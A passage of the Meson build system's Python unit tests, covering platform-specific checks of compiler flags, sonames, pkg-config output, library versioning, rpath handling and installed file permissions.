cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2])}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
lang_std = p + '_std'
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()[lang_std].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0]))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
